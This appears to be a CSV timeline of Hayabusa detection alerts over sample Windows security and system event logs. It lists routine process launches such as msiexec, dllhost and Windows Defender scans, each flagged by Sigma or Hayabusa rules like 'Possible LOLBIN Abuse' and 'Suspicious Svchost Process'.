Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:49:56.315 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:49:59.727 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:03.843 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:03.998 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:11.414 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:11.583 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:23.151 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:23.337 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:37.272 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:37.462 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:52:34.610 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:52:34.820 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:53:22.275 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:53:22.491 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:53:23.408 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 15:07:41.210 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 15:52:11.006 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 16:11:14.220 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:15.534 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:44.532 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:44.676 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:44.692 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:21:44.528 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:21:44.528 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:27:33.432 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:34:52.733 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:34:54.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 21:35:14.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 21:35:14.187 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.187 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.296 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.296 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.343 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.343 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.453 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.453 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.500 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.578 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.796 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.796 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.171 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.171 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.773 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.945 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.945 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.976 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.976 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:16.101 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:26.179 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.507 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.539 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.601 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.679 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:40.667 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:44.084 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:44.084 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:46.165 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:46.165 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:36:24.719 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:36:26.520 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:48:30.867 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:48:30.867 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 22:05:29.336 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 22:57:17.289 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 22:57:39.909 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:00:54.622 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:03:14.642 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:03:14.751 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:03.967 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:04.123 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:05.218 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:05.234 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:05.439 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:15.400 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:19.485 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:23.091 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:48.668 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:36:25.895 